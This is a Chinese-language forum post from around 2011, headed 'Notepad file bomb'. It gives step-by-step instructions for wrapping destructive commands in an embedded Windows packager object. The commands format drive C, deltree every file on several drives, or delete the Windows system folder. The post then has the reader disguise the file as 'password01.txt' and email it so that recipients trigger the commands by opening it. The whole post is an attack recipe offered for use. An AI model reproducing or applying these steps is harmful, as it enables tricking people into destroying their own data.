網際論壇 - 軟體綜合研討 - [文書處理]記事本文件炸彈
» 遊客:  註冊 | 登錄 | 會員 | 幫助
 

免費線上小說
動漫分類 : 最新上架熱門連載全本小說最新上架玄幻奇幻都市言情武俠仙俠軍事歷史網游競技科幻靈異 ... 更多小說

作者:
標題: [文書處理]記事本文件炸彈 上一主題 | 下一主題
  sunny6311
  基本會員 
 



  積分 52
  發文 16
  註冊 2005-9-7
  狀態 離線
#1  [文書處理]記事本文件炸彈

1.新增一個只包含一個空格(為了減小文件體積)的文本文件,任意取名。

  2.開啟{記事本文件},將此文件拖放入{記事本文件}。也可以點擊記{記事本文件}單欄中的「插入\對像」,彈出「插入對像」對話視窗,選「從文件新增」,然後點擊「瀏覽」按鈕選項要插入的文件。

  3.選該插入對象的圖示,選項功能表欄中的「編輯\包對像\編輯包」(如圖1)。在彈出的「對像包裝程序」對話視窗中,選項功能表欄中的「編輯\指令行」,然後輸入如下指令:start.exe /m format c:/q /autotest /u ,點擊「確定」,此時,內容欄中會顯示出指令內容。

  4.點擊外觀欄中的「插入圖示」按鈕,會彈出一個警告對話視窗,驗證,然後任選一個圖示。

  5.選項功能表欄中的「編輯\卷冊」,為此嵌入對像取一個名稱(會取代原來的檔案名稱)。點擊「文件」功能表中的「更新」,然後關閉此對話視窗。

  6.將剛剛建立的嵌入對像拖放到桌面上。文件的預設名是「碎片」(在2000下的預設名為」片段」),現在我們把它改成「password01.txt」。開啟電子郵件程式將桌面上的「password01.txt」作為附件發出,或者將含有嵌入對像(帶有惡意指令)的文件作為附件發出。

  7.當郵件接收者誤將「password01.txt.shs」文件作為「password01.txt」(如前文所述,「.SHS」副檔名永遠是隱藏的)放心地開啟時,或開啟文件,點擊文件中的嵌入對像時觸發惡意指令(彈出DOS執行視窗,執行格式化指令).如果將上面的指令取代為:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 則是將移除對方硬碟下所有文件(磁碟代號根據實際情況自訂);如果取代為:start.exe /m deltree /y c:\windows\system\*.* 則是移除對方c:\windows\system\目錄底下的所有文件.(當然大家可以改成其它的指令)
  真的很簡單,就這樣一個惡意的攻擊程序被弄出來了,太可怕了!


2011-2-11 01:01 PM
查看資料  發短消息   編輯文章  引用回覆

可打印版本 | 推薦給朋友 | 訂閱主題 | 收藏主題

論壇跳轉選單: